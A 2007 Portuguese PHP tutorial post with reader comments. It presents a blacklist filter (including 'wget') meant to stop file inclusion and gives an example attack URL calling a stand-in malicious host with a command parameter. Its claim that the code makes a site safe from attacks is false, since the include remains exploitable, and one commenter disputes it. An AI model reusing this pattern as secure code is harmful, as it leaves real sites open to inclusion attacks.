Bloquear php injection
RSS feed do site?
Publicado em: 28/05/2007
Área: PHP
Visualizações: 4.939
Comentário(s): 3
<?php
//Pega os dados passados pela URL
$pagina=$_GET['pagina'];
//Verifica se a string passada possui algum trecho invalido
//Caso tenha mostra uma mensagem de erro
if(eregi("http|www|ftp|.dat|.txt|.gif|wget", $pagina))
{
echo "Ops! Problemas na página!";
//Se a variavel passada estiver dentro das normas, executa o else abaixo:
}else{
if(!empty($pagina)) {
@include ("$pagina.php");
}else{
@include ("capa.php"); //essa seria a sua página principal
}
}
?>Vamos entender o código !
Ele não deixa que ninguém tente colocar urls e outros tipos de códigos em sua query string !
Por exemplo, seu site funciona da seguinte maneira:
index.php?pagina=contato
assim funciona beleza
E se o cidadão tentar fazer isso:
index.php?pagina=http://www.sitedovirus.com&cmd=comando malicioso
aí o script bloqueia !
Faça isso e fique livre de ataques crackers em seu site !
Até a próxima !
Eu sou www.igordiniz.com.br :D O mais bonito de todos os colunistas da Oficina da Net ;)
Todas as matérias de Igor Diniz
- 1992 - O ano em que Bill Gates previu o futuro dos computadores
O computador terá o tamanho que você quiser. Poderá ser do tamanho da .
- Photoshop: Aplicando tatuagem em uma pessoa
Aqui veremos como aplicar uma tatuagem a qualquer pessoa de uma maneir.
- Dicas para tornar seu site conhecido
Público é um item fundamental para se ter um site. De que adianta você.
- Imagens em quebra cabeça
Veja como transformar suas imagens em quebra cabeças de uma maneira be.
- Vídeo Aula Sony vegas - Criando efeito de filme antigo
Olá pessoal, estou aqui para mais uma vídeo aula, desta vez vou mostra.
- Vídeo aula: Compactar e descompactar arquivos com PHP
Neste tutorial vou mostrar como criar arquivos em formato zip, e como .
- O que é o PHP-GTK?
O GTK é um conjunto de bibliotecas, desenvolvido originalmente por Pet.
- Fedd RSS com atualização automática (XML + PHP + MySQL)
Queridos leitores, hoje vou mostrar para vocês como montar um Feed RSS.
- Chamando arquivo PHP por Java Script
Esta forma você pode ainda passar parâmetros a serem utilizados dentro.
- Paginator: Paginação de resultados com PHP + MySQL + CSS
Paginação de resultados hoje é um processo indispensável no desenvolvi.
- Anuncie |
- Cadastro |
- Divulgue-nos |
- Fale Conosco |
- Layouts |
- Links |
- Mapa do site |
- Colunas populares |
- PageRank Checker |
- RSS |
- Vídeos
© 2005 - 2009 - Oficina da Net - v 4.0 - É proibida a reprodução parcial ou completa do conteúdo deste site sem autorização por escrito. Resolução adequada: 1024x768px.
- Publicado em: 01/06/2007 - 01:07
Bem Igor, Vou postar um comentário somente pelo seu desfeche da matéria. Acho que você iniciou com uma maneira muito básica, o assunto injection scripts é muito vasto e existem bibliotecas robustas que resolvem esse tipo de problema, não vou entrar muito em detalhes, mas não afirme que só com isso um site está fora de perigo de ataques crackers. Meu comentário é: ILUSÃO!
- Publicado em: 01/06/2007 - 18:37
Positivo, o ste estará "seguro" nessa parte de injection pelas strings.
Nicolas Muller
- Publicado em: 05/06/2007 - 22:39
É, crackers e spammers não tem jeito, sempre arrumam uma forma de enfernizar a nossa vida!